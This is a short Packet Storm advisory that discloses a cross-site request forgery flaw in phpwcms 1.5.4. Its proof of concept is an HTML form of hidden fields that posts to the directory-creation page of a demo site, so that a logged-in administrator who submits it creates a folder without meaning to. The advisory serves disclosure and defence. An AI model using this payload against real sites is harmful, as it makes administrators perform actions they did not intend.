PHPWCMS version 1.5.4 suffers from a cross site request forgery vulnerability.
1046ce106cdd2916a9cfc71edf099e976203abb3d5850f12d20df43b99c303ca# Affected software: phpwcms
# Type of vulnerability:csrf
# URL:http://www.opensourcecms.com/demo/2/54/phpwcms
# Discovered by: provensec
# Website: provensec.com
#version:1.5.4
# Proof of concept
no csrf protections were used on directory creation page
<html>
<body>
<form action="
http://demo.opensourcecms.com/phpwcms/phpwcms.php?do=files&f=0"
method="POST">
<input type="hidden" name="dir_newname" value="fff" />
<input type="hidden" name="dir_longinfo" value="fff" />
<input type="hidden" name="dir_gallery" value="0" />
<input type="hidden" name="dir_sort" value="0" />
<input type="hidden" name="dir_aktiv" value="1" />
<input type="hidden" name="dir_pid" value="0" />
<input type="hidden" name="dir_aktion" value="1" />
<input type="hidden" name="Submit" value="create new dir" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed